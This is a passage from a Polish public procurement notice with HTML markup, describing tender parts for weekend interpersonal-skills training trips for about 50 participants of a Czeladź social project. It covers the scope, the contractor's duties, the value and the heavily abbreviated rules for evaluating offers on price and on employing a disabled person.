niepełnosprawnością. <br/>Liczba uczestników/czek: 50 osób (+/- 10%) na każdy wyjazd,<br/>1. Każdy wyjazdowy trening interpersonalny obejmuje w szczególności:<br/>1.1. Trening interpersonalny powinien być prowadzony dla około 50 osób podzielonych na dwie – średnio 25-osobowe grupy, w odrębnych salach. Zajęcia powinny być prowadzone równocześnie w dwóch grupach. <br/>Przewiduje się przeprowadzenie treningu interpersonalnego łącznie: max. do 12 godzin zegarowych w trakcie 2 dni (w tym 7 godz. w sobotę, 5 godz. w niedzielę) w następujący sposób:<br/>1.2. Drugi dzień, tj. sobota – w godzinach od 9.00 do 16.00 (łącznie z przerwą kawową i obiadową)<br/>1.3. Trzeci dzień, tj. niedziela – w godzinach od 9.00 do 14:00 (łącznie z przerwą kawową i obiadową)<br/>1.4.Tematyka treningu interpersonalnego (minimalny zakres):<br/>- rozwój kompetencji miękkich,- budowanie zespołu, w tym umiejętności z zakresu podnoszenia wiedzy i świadomości na temat zarządzania różnorodnością, wsparcia kompetencji managerskich,- rozpoznawanie i wyrażanie emocji, - pogłębianie relacji międzyludzkich,- poprawa komunikacji.<br/>Zamawiający wymaga, aby trening interpersonalny miał formę zajęć warsztatowych (min. 75% łącznego czasu przewidzianego na realizację treningu) i uwzględniał różnorodne techniki/narzędzia prowadzenia zajęć (np. ćwiczenia, gry, odgrywanie scenek, itp.). Zamawiający zwraca uwagę, że w treningu interpersonalnym mogą brać udział osoby z niepełnosprawnością, w związku z czym wykonawca zapewnia dostępność dla ww. osób, zgodnie z wymogami standardu szkoleniowego, określonego w załączniku nr 2 do Wytycznych dotyczących realizacji zasad równościowych w ramach funduszy unijnych na lata 2021-2027.<br/>2. Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest do zapewnienia:<br/>2.1. Wyżywienie<br/>2.2. Zakwaterowania<br/>2.3. Przewozu uczestników projektu<br/>2.4. Pokrycia wszystkich wymaganych opłat parkingowych i drogowych.<br/>2.5. Ubezpieczenia grupy w pełnym zakresie - dla 50 osób (+/- 10%) <br/>2.6. Opracowania harmonogramu i programu treningu interpersonalnego z zakresu rozwijania umiejętności interpersonalnych Zamawiającemu w terminie 7 dni od dnia podpisania umowy. <br/>2.7. Udokumentowania fotograficznego (min. 10 zdjęć dobrej jakości)<br/>2.8 Organizacja jednego wieczorku integracyjnego<br/>2.9. Dysponowania odpowiednim potencjałem osobowym tj.:<br/>• 1 osobą, która będzie odpowiedzialna za prawidłową realizację programu zgodnego z harmonogramem treningu interpersonalnego, w tym: prowadzenia dokumentacji, kontakt z Zamawiającym, organizacji czasu wolnego podczas trwania szkolenia wyjazdowego, zapewnienia sprawnego zakwaterowania i wykwaterowania uczestników/czek wraz ze wsparciem w przypadku ewentualnych problemów/reklamacji związanych z użytkowaną infrastrukturą hotelową. <br/>• 2 wykwalifikowanymi trenerami<br/>2.10. Prowadzenia następującej dokumentacji:<br/>a) list obecności na zajęciach zawierających tytuł treningu interpersonalnego, datę, imię i nazwisko, podpis uczestnika,<br/>b) list potwierdzających zakwaterowanie oraz odbioru wydawanych posiłków wraz z poczęstunkiem kawowym zawierających<br/>2.11. Przestrzegania zasad równości szans kobiet i mężczyzn.<br/>2.12. Przekazania całości wymaganej dokumentacji w terminie 5 dni roboczych od dnia zakończenia realizacji treningu interpersonalnego zgodnie z warunkami określonymi w umowie.<br/>2.13. Na każdym etapie realizacji zadania, Zamawiający zastrzega sobie prawo do kontroli, dokumentów, związanych z realizowanym projektem<br/>Z uwagi na na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w załączniku nr 6 do SWZ tj. opis przedmiotu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 97497,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-10-24 do 2025-10-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przywyborzeof.zam.kierowałsiębędzinast.kryteriami,zuwzgl.Odpow.współczynnikówag(znacz.wyraż.w%)dla tych kr.oraz maks.il.pkt,jaką może otrzy.of.za dane kryt.:<br/>Dla wszyst.cz.zam.kr.oceny of.są: <br/>1Cena–waga proc-max60%(C)2zatrud.os.niepełn.–wag.proc-max40(Pd)Of.zos.ocen.zapom.Sys.pkt,zg.zponiż.kryt:Kryt.I-Cenaofbrutto(C)–max60%a)Zam.przyz.max.licz.60pkt.of.wyk.znajniż.cenąbruttozawyk.przed.zam.zg.zformul.of.stan.Załnr1a,b,c,d doSWZb)Il.pkt.przyz.pozost.of.wyk.zost.oblicz.zg.z nast.wz.i zaokr.do dw.m.po przec.naj.c.wys.w of.<br/>C=----------------x60<br/>cena badana<br/>U1:Zg.zart.225ust.2u.pzp,jeżelizł.of.kt.wyb.prow.dopowst.uzam.obo.podat.zg.zprzepis.opod.odtow.i usł.Zam.wceluoc.tak.of.doliczadoprzedst.wniejcenypod.odtow.iusł.,kt.miał.obow.Rozli.zg.ztymiprzepis.Wyk.skład.of.inf.zam.czy wyb.of.będzie prowa.do powst.u zam.obow.podat.,wsk. Naz.(rodzaj)tow.lub usł.któ.dost.lub świad.będzieprow.dojegopowst.orazwsk.ichwart.bezkw.podat.istaw.podat.odtow.iusł.którazg.zwie.wyk.b.mia.zastos.W pow.przyp.wyk.podaje w form.of.tylko wart.netto w odnies.do wsk.zakr.przed.zam.zam.w m.przez.nawsk.cenybruttood.stos.Infor.opow.obow.podat.Kryt.IIZatrud.conaj.1(jednej)os.niepełn.dorealiz.zam-max40%(Pd)Zam.wram.tegokryt.przyznaWyk.pkt.napods.oświad.zaw.wFor.of.Wyk.ot.40pktza zatrud.do realiz.zam.now.os. z niepełnospr.nie będących ob.prac.wyk/podwyk lub oddeleg.do realiz.zam.os.z niepełnospraw.zatr.ob.uwyk/podwykOs.zniepełnospraw.toos.speł.war.uzysk.stat.niepełnospr.okr.wu.z dnia27.08.1997o rehab. Zaw.i społ.o.zatrud.os.niepełnospr.lub we właś.przepis.państw członk.UelubEOGlub państw,zkt.UEzawarłaum.rów.trakt.przedsięb.w dost.do zp,na czas realizacji przed.zam.W przyp.gdyWyk.w formul.of.nieuzupełnipolaot.zatrud/oddelegoreal.zam.os.niepełnos.wów.Zam.przyznaWyk0pkt.a)Pop.zatr.nal.roz:zatr.napodst.um.opracęlubwop.o um. c-p. Tym samym os.mogą być zatrud.na podst:um.ag.,um.zl.,um.o dzieło.Zam.wym.zatr./oddeleg.1os.b)Wym.wzakr.zatrud./oddeleg.odn.siędozaangaż.os.niepeł.dorealiz.przed. Zam.poprzez pow.tej os.czynn.zw.z fakt.realiz.zam.c)Wyk.zł.oś.,najpóź.do dn.rozp.reali.um,dot zakr.i rodz. zad.,kt.będzie wyk.os.niepełnos.w ram.reali.um.d)Zam.upr.b.do kont.speł.przez Wyk.wym.dot.zatr.os. Niepełn.U2:Przy ob.pkt.zam.zas.zaokr.do dw.m.po przec.wd.zas.że trzecia cyf.po przec.od5w górę pow. zaokr.dr.cyf.po przec.w górę o1.Jeśli trz.cyf.po przec.j.mn.niż5,to dr.cyf.po przec.nie ul.zm.Zam.dok.wyb. of.t.z wyk.,kt.of.uz.w wyn.oc.najwyż.licz.pkt. Przyzn. pkt poszcz.of.odb.się w opar.o wz:L = C + Pd gdzie:L-licz.pkt uzys.przez of.C–licz.pkt uzysk.w kryt.&#34;Cena&#34;.Pd–licz.pkt uzysk.w kryt.„Zatrud.lub oddeleg.os. Niepełnos.dorealiz.zammax40pkt”2.Oc.b.podl.wył.of.niepodleg.odrzuc.3.Zanajkorzys.zos.uz.of.kt.otrz.najw.il.pktłącz.zewszys.kryt.4.Wsyt.,gdyzam.nieb.mógłok.wyb.Najkorzys.of.zewz.nato,żezost.zł.of.otak.sam.il.pkt,wez.onwyk.,kt.zło.tef.dozł.w term.okr.przez zam.of.dodat.zaw.n.cenę. Wyk.skł.of.dod.,nie m.zaofer.cen wyż.niż zaof.w up.złoż.przeznichof.5. W toku bad.of.i oc.of.zam.może ż. od wyk. Wyjaś.dot. treści złoż. przez nich of.oraz/lubinn.SkłDok.luboś.Wyk.sązob.doprzeds.wyjaś.wterm.wsk.p.zam.6.Zam.wyb.najkorzys.of.w term.zw.of.okreś.naplat.zakup.zpostęp.7.Jeżeliter.zw.of.upł.przedwyb.najkorzys.of.,zam.wez.wyk.,któr.of.otrz.najwyż.oc.do wyraż.w wyznacz.przezzam.term.pisem.zg.nawyb.jegoof.8.Wprzyp.br.zg.okt.mo.wpkt7of.podle.odrzuc.,azam.zwr.się wyraż.tak. zg.do kolej.wyk.,kt.of.zos.najwyż.oc.,chybaże,zach.przes.do unieważ.postęp.9.Zam. Unieważ.postęp.o udziel.zam. jeżeli:1)nie złoż.żad.wn. o dopusz.do udzi.w postęp. albo żadnej of2)wszys.zł.wn.o dop.do udz.w postęp.al.of.podl.odrzuc3)cena lub koszt najkorzys.of.lub of.z najni.c.przewyż.kw.kt.zam.zam.przez.na sfinan.zam.,chybażezam.m.zwię.tękw.doc.lubkosz.najkorzys.of4)wprzyp,okt.m.w art.248ust.3,art.249iart.250ust.2,zos.zł.of.dod.o tak.sam.c.lub kosz5)wyst.istot.z.oko.pow.,żepro.pos.lub wyk.zam.nieleżywinter.pub.,cze.niem.byłowcześ.przew6)post.Obar.jestniemoż.dousun.wadąuniemoż.zaw.niepod.uniew.umo.w spr.zam.pub.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie co najmniej 1 (jednej) osoby niepełnosprawnej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Miejsce realizacji: Subregion Południowy Województwa Śląskiego (powiat bielski, żywiecki, cieszyński oraz miasto Bielsko-Biała).<br/>Adresaci zadania: uczestnicy/czki projektu pt.: &#34;Od Czeladzkiej transformacji do międzypokoleniowej reaktywacji&#34;, dorośli i osoby powyżej 15 r.ż.,<br/>Uczestnicy/czki treningu interpersonalnego stanowią osoby mieszkające lub pracujące lub uczące się na terenie Czeladzi: kobiety i mężczyźni, w tym możliwy udział osób z niepełnosprawnością. <br/>Liczba uczestników/czek: 50 osób (+/- 10%) na każdy wyjazd,<br/>1. Każdy wyjazdowy trening interpersonalny obejmuje w szczególności:<br/>1.1. Trening interpersonalny powinien być prowadzony dla około 50 osób podzielonych na dwie – średnio 25-osobowe grupy, w odrębnych salach. Zajęcia powinny być prowadzone równocześnie w dwóch grupach. <br/>Przewiduje się przeprowadzenie treningu interpersonalnego łącznie: max. do 12 godzin zegarowych w trakcie 2 dni (w tym 7 godz. w sobotę, 5 godz. w niedzielę) w następujący sposób:<br/>1.2. Drugi dzień, tj. sobota – w godzinach od 9.00 do 16.00 (łącznie z przerwą kawową i obiadową)<br/>1.3. Trzeci dzień, tj. niedziela – w godzinach od 9.00 do 14:00 (łącznie z przerwą kawową i obiadową)<br/>1.4.Tematyka treningu interpersonalnego (minimalny zakres):<br/>- rozwój kompetencji miękkich,- budowanie zespołu, w tym umiejętności z zakresu podnoszenia wiedzy i świadomości na temat zarządzania różnorodnością, wsparcia kompetencji managerskich,- rozpoznawanie i wyrażanie emocji, - pogłębianie relacji międzyludzkich,- poprawa komunikacji.<br/>Zamawiający wymaga, aby trening interpersonalny miał formę zajęć warsztatowych (min. 75% łącznego czasu przewidzianego na realizację treningu) i uwzględniał różnorodne techniki/narzędzia prowadzenia zajęć (np. ćwiczenia, gry, odgrywanie scenek, itp.). Zamawiający zwraca uwagę, że w treningu interpersonalnym mogą brać udział osoby z niepełnosprawnością, w związku z czym wykonawca zapewnia dostępność dla ww. osób, zgodnie z wymogami standardu szkoleniowego, określonego w załączniku nr 2 do Wytycznych dotyczących realizacji zasad równościowych w ramach funduszy unijnych na lata 2021-2027.<br/>2. Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest do zapewnienia:<br/>2.1. Wyżywienie<br/>2.2. Zakwaterowania<br/>2.3. Przewozu uczestników projektu<br/>2.4. Pokrycia wszystkich wymaganych opłat parkingowych i drogowych.<br/>2.5. Ubezpieczenia grupy w pełnym zakresie - dla 50 osób (+/- 10%) <br/>2.6. Opracowania harmonogramu i programu treningu interpersonalnego z zakresu rozwijania umiejętności interpersonalnych Zamawiającemu w terminie 7 dni od dnia podpisania umowy. <br/>2.7. Udokumentowania fotograficznego (min. 10 zdjęć dobrej jakości)<br/>2.8 Organizacja jednego wieczorku integracyjnego<br/>2.9. Dysponowania odpowiednim potencjałem osobowym tj.:<br/>• 1 osobą, która będzie odpowiedzialna za prawidłową realizację programu zgodnego z harmonogramem treningu interpersonalnego, w tym: prowadzenia dokumentacji, kontakt z Zamawiającym, organizacji czasu wolnego podczas trwania szkolenia wyjazdowego, zapewnienia sprawnego zakwaterowania i wykwaterowania uczestników/czek wraz ze wsparciem w przypadku ewentualnych problemów/reklamacji związanych z użytkowaną infrastrukturą hotelową. <br/>• 2 wykwalifikowanymi trenerami<br/>2.10. Prowadzenia następującej dokumentacji:<br/>a) list obecności na zajęciach zawierających tytuł treningu interpersonalnego, datę, imię i nazwisko, podpis uczestnika,<br/>b) list potwierdzających zakwaterowanie oraz odbioru wydawanych posiłków wraz z poczęstunkiem kawowym zawierających<br/>2.11. Przestrzegania zasad równości szans kobiet i mężczyzn.<br/>2.12. Przekazania całości wymaganej dokumentacji w terminie 5 dni roboczych od dnia zakończenia realizacji treningu interpersonalnego zgodnie z warunkami określonymi w umowie.<br/>2.13. Na każdym etapie realizacji zadania, Zamawiający zastrzega sobie prawo do kontroli, dokumentów, związanych z realizowanym projektem<br/>Z uwagi na na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w załączniku nr 6 do SWZ tj. opis przedmiotu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 97497,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-11-21 do 2025-11-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przywyborzeof.zam.kierowałsiębędzinast.kryteriami,zuwzgl.Odpow.współczynnikówag(znacz.wyraż.w%)dla tych kr.oraz maks.il.pkt,jaką może otrzy.of.za dane kryt.:<br/>Dla wszyst.cz.zam.kr.oceny of.są: <br/>1Cena–waga proc-max60%(C)2zatrud.os.niepełn.–wag.proc-max40(Pd)Of.zos.ocen.zapom.Sys.pkt,zg.zponiż.kryt:Kryt.I-Cenaofbrutto(C)–max60%a)Zam.przyz.max.licz.60pkt.of.wyk.znajniż.cenąbruttozawyk.przed.zam.zg.zformul.of.stan.Załnr1a,b,c,d doSWZb)Il.pkt.przyz.pozost.of.wyk.zost.oblicz.zg.z nast.wz.i zaokr.do dw.m.po przec.naj.c.wys.w of.<br/>C=----------------x60<br/>cena badana<br/>U1:Zg.zart.225ust.2u.pzp,jeżelizł.of.kt.wyb.prow.dopowst.uzam.obo.podat.zg.zprzepis.opod.odtow.i usł.Zam.wceluoc.tak.of.doliczadoprzedst.wniejcenypod.odtow.iusł.,kt.miał.obow.Rozli.zg.ztymiprzepis.Wyk.skład.of.inf.zam.czy wyb.of.będzie prowa.do powst.u zam.obow.podat.,wsk. Naz.(rodzaj)tow.lub usł.któ.dost.lub świad.będzieprow.dojegopowst.orazwsk.ichwart.bezkw.podat.istaw.podat.odtow.iusł.którazg.zwie.wyk.b.mia.zastos.W pow.przyp.wyk.podaje w form.of.tylko wart.netto w odnies.do wsk.zakr.przed.zam.zam.w m.przez.nawsk.cenybruttood.stos.Infor.opow.obow.podat.Kryt.IIZatrud.conaj.1(jednej)os.niepełn.dorealiz.zam-max40%(Pd)Zam.wram.tegokryt.przyznaWyk.pkt.napods.oświad.zaw.wFor.of.Wyk.ot.40pktza zatrud.do realiz.zam.now.os. z niepełnospr.nie będących ob.prac.wyk/podwyk lub oddeleg.do realiz.zam.os.z niepełnospraw.zatr.ob.uwyk/podwykOs.zniepełnospraw.toos.speł.war.uzysk.stat.niepełnospr.okr.wu.z dnia27.08.1997o rehab. Zaw.i społ.o.zatrud.os.niepełnospr.lub we właś.przepis.państw członk.UelubEOGlub państw,zkt.UEzawarłaum.rów.trakt.przedsięb.w dost.do zp,na czas realizacji przed.zam.W przyp.gdyWyk.w formul.of.nieuzupełnipolaot.zatrud/oddelegoreal.zam.os.niepełnos.wów.Zam.przyznaWyk0pkt.a)Pop.zatr.nal.roz:zatr.napodst.um.opracęlubwop.o um. c-p. Tym samym os.mogą być zatrud.na podst:um.ag.,um.zl.,um.o dzieło.Zam.wym.zatr./oddeleg.1os.b)Wym.wzakr.zatrud./oddeleg.odn.siędozaangaż.os.niepeł.dorealiz.przed. Zam.poprzez pow.tej os.czynn.zw.z fakt.realiz.zam.c)Wyk.zł.oś.,najpóź.do dn.rozp.reali.um,dot zakr.i rodz. zad.,kt.będzie wyk.os.niepełnos.w ram.reali.um.d)Zam.upr.b.do kont.speł.przez Wyk.wym.dot.zatr.os. Niepełn.U2:Przy ob.pkt.zam.zas.zaokr.do dw.m.po przec.wd.zas.że trzecia cyf.po przec.od5w górę pow. zaokr.dr.cyf.po przec.w górę o1.Jeśli trz.cyf.po przec.j.mn.niż5,to dr.cyf.po przec.nie ul.zm.Zam.dok.wyb. of.t.z wyk.,kt.of.uz.w wyn.oc.najwyż.licz.pkt. Przyzn. pkt poszcz.of.odb.się w opar.o wz:L = C + Pd gdzie:L-licz.pkt uzys.przez of.C–licz.pkt uzysk.w kryt.&#34;Cena&#34;.Pd–licz.pkt uzysk.w kryt.„Zatrud.lub oddeleg.os. Niepełnos.dorealiz.zammax40pkt”2.Oc.b.podl.wył.of.niepodleg.odrzuc.3.Zanajkorzys.zos.uz.of.kt.otrz.najw.il.pktłącz.zewszys.kryt.4.Wsyt.,gdyzam.nieb.mógłok.wyb.Najkorzys.of.zewz.nato,żezost.zł.of.otak.sam.il.pkt,wez.onwyk.,kt.zło.tef.dozł.w term.okr.przez zam.of.dodat.zaw.n.cenę. Wyk.skł.of.dod.,nie m.zaofer.cen wyż.niż zaof.w up.złoż.przeznichof.5. W toku bad.of.i oc.of.zam.może ż. od wyk. Wyjaś.dot. treści złoż. przez nich of.oraz/lubinn.SkłDok.luboś.Wyk.sązob.doprzeds.wyjaś.wterm.wsk.p.zam.6.Zam.wyb.najkorzys.of.w term.zw.of.okreś.naplat.zakup.zpostęp.7.Jeżeliter.zw.of.upł.przedwyb.najkorzys.of.,zam.wez.wyk.,któr.of.otrz.najwyż.oc.do wyraż.w wyznacz.przezzam.term.pisem.zg.nawyb.jegoof.8.Wprzyp.br.zg.okt.mo.wpkt7of.podle.odrzuc.,azam.zwr.się wyraż.tak. zg.do kolej.wyk.,kt.of.zos.najwyż.oc.,chybaże,zach.przes.do unieważ.postęp.9.Zam. Unieważ.postęp.o udziel.zam. jeżeli:1)nie złoż.żad.wn. o dopusz.do udzi.w postęp. albo żadnej of2)wszys.zł.wn.o dop.do udz.w postęp.al.of.podl.odrzuc3)cena lub koszt najkorzys.of.lub of.z najni.c.przewyż.kw.kt.zam.zam.przez.na sfinan.zam.,chybażezam.m.zwię.tękw.doc.lubkosz.najkorzys.of4)wprzyp,okt.m.w art.248ust.3,art.249iart.250ust.2,zos.zł.of.dod.o tak.sam.c.lub kosz5)wyst.istot.z.oko.pow.,żepro.pos.lub wyk.zam.nieleżywinter.pub.,cze.niem.byłowcześ.przew6)post.Obar.jestniemoż.dousun.wadąuniemoż.zaw.niepod.uniew.umo.w spr.zam.pub.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie co najmniej 1 (jednej) osoby niepełnosprawnej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Miejsce realizacji: Subregion Południowy Województwa Śląskiego (powiat bielski, żywiecki, cieszyński oraz miasto Bielsko-Biała).<br/>Adresaci zadania: uczestnicy/czki projektu pt.: &#34;Od Czeladzkiej transformacji do międzypokoleniowej reaktywacji&#34;, dorośli i osoby powyżej 15 r.ż.,<br/>Uczestnicy/czki treningu interpersonalnego stanowią osoby mieszkające lub pracujące lub uczące się na terenie Czeladzi: kobiety i mężczyźni, w tym możliwy udział osób z niepełnosprawnością. <br/>Liczba uczestników/czek: 50 osób (+/- 10%) na każdy wyjazd,<br/>1. Każdy wyjazdowy trening interpersonalny obejmuje w szczególności:<br/>1.1. Trening interpersonalny powinien być prowadzony dla około 50 osób podzielonych na dwie – średnio 25-osobowe grupy, w odrębnych salach. Zajęcia powinny być prowadzone równocześnie w dwóch grupach. <br/>Przewiduje się przeprowadzenie treningu interpersonalnego łącznie: max. do 12 godzin zegarowych w trakcie 2 dni (w tym 7 godz. w sobotę, 5 godz. w niedzielę) w następujący sposób:<br/>1.2. Drugi dzień, tj. sobota – w godzinach od 9.00 do 16.00 (łącznie z przerwą kawową i obiadową)<br/>1.3. Trzeci dzień, tj. niedziela – w godzinach od 9.00 do 14:00 (łącznie z przerwą kawową i obiadową)<br/>1.4.Tematyka treningu interpersonalnego (minimalny zakres):<br/>- rozwój kompetencji miękkich,- budowanie zespołu, w tym umiejętności z zakresu podnoszenia wiedzy i świadomości na temat zarządzania różnorodnością, wsparcia kompetencji managerskich,- rozpoznawanie i wyrażanie emocji, - pogłębianie relacji międzyludzkich,- poprawa komunikacji.<br/>Zamawiający wymaga, aby trening interpersonalny miał formę zajęć warsztatowych (min. 75% łącznego czasu przewidzianego na realizację treningu) i uwzględniał różnorodne techniki/narzędzia prowadzenia zajęć (np. ćwiczenia, gry, odgrywanie scenek, itp.). Zamawiający zwraca uwagę, że w treningu interpersonalnym mogą brać udział osoby z niepełnosprawnością, w związku z czym wykonawca zapewnia dostępność dla ww. osób, zgodnie z wymogami standardu szkoleniowego, określonego w załączniku nr 2 do Wytycznych dotyczących realizacji zasad równościowych w ramach funduszy unijnych na lata 2021-2027.<br/>2. Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest do zapewnienia:<br/>2.1. Wyżywienie<br/>2.2. Zakwaterowania<br/>2.3. Przewozu uczestników projektu<br/>2.4. Pokrycia wszystkich wymaganych opłat parkingowych i drogowych.<br/>2.5. Ubezpieczenia grupy w pełnym zakresie - dla 50 osób (+/- 10%) <br/>2.6. Opracowania harmonogramu i programu treningu interpersonalnego z zakresu rozwijania umiejętności interpersonalnych Zamawiającemu w terminie 7 dni od dnia podpisania umowy. <br/>2.7. Udokumentowania fotograficznego (min. 10 zdjęć dobrej jakości)<br/>2.8 Organizacja jednego wieczorku integracyjnego<br/>2.9. Dysponowania odpowiednim potencjałem osobowym tj.:<br/>• 1 osobą, która będzie odpowiedzialna za prawidłową realizację programu zgodnego z harmonogramem treningu interpersonalnego, w tym: prowadzenia dokumentacji, kontakt z Zamawiającym, organizacji czasu wolnego podczas trwania szkolenia wyjazdowego, zapewnienia sprawnego zakwaterowania i wykwaterowania uczestników/czek wraz ze wsparciem w przypadku ewentualnych problemów/reklamacji związanych z użytkowaną infrastrukturą hotelową. <br/>• 2 wykwalifikowanymi trenerami<br/>2.10. Prowadzenia następującej dokumentacji:<br/>a) list obecności na zajęciach zawierających tytuł treningu interpersonalnego, datę, imię i nazwisko, podpis uczestnika,<br/>b) list potwierdzających zakwaterowanie oraz odbioru wydawanych posiłków wraz z poczęstunkiem kawowym zawierających<br/>2.11. Przestrzegania zasad równości szans kobiet i mężczyzn.<br/>2.12. Przekazania całości wymaganej dokumentacji w terminie 5 dni roboczych od dnia zakończenia realizacji treningu interpersonalnego zgodnie z warunkami określonymi w umowie.<br/>2.13. Na każdym etapie realizacji zadania, Zamawiający zastrzega sobie prawo do kontroli, dokumentów, związanych z realizowanym projektem<br/>Z uwagi na na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w załączniku nr 6 do SWZ tj. opis przedmiotu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 97497,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-04-17 do 2026-04-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przywyborzeof.zam.kierowałsiębędzinast.kryteriami,zuwzgl.Odpow.współczynnikówag(znacz.wyraż.w%)dla tych kr.oraz maks.il.pkt,jaką może otrzy.of.za dane kryt.:<br/>Dla wszyst.cz.zam.kr.oceny of.są: <br/>1Cena–waga proc-max60%(C)2zatrud.os.niepełn.–wag.proc-max40(Pd)Of.zos.ocen.zapom.Sys.pkt,zg.zponiż.kryt:Kryt.I-Cenaofbrutto(C)–max60%a)Zam.przyz.max.licz.60pkt.of.wyk.znajniż.cenąbruttozawyk.przed.zam.zg.zformul.of.stan.Załnr1a,b,c,d doSWZb)Il.pkt.przyz.pozost.of.wyk.zost.oblicz.zg.z nast.wz.i zaokr.do dw.m.po przec.naj.c.wys.w of.<br/>C=----------------x60<br/>cena badana<br/>U1:Zg.zart.225ust.2u.pzp,jeżelizł.of.kt.wyb.prow.dopowst.uzam.obo.podat.zg.zprzepis.opod.odtow.i usł.Zam.wceluoc.tak.of.doliczadoprzedst.wniejcenypod.odtow.iusł.,kt.miał.obow.Rozli.zg.ztymiprzepis.Wyk.skład.of.inf.zam.czy wyb.of.będzie prowa.do powst.u zam.obow.podat.,wsk. Naz.(rodzaj)tow.lub usł.któ.dost.lub 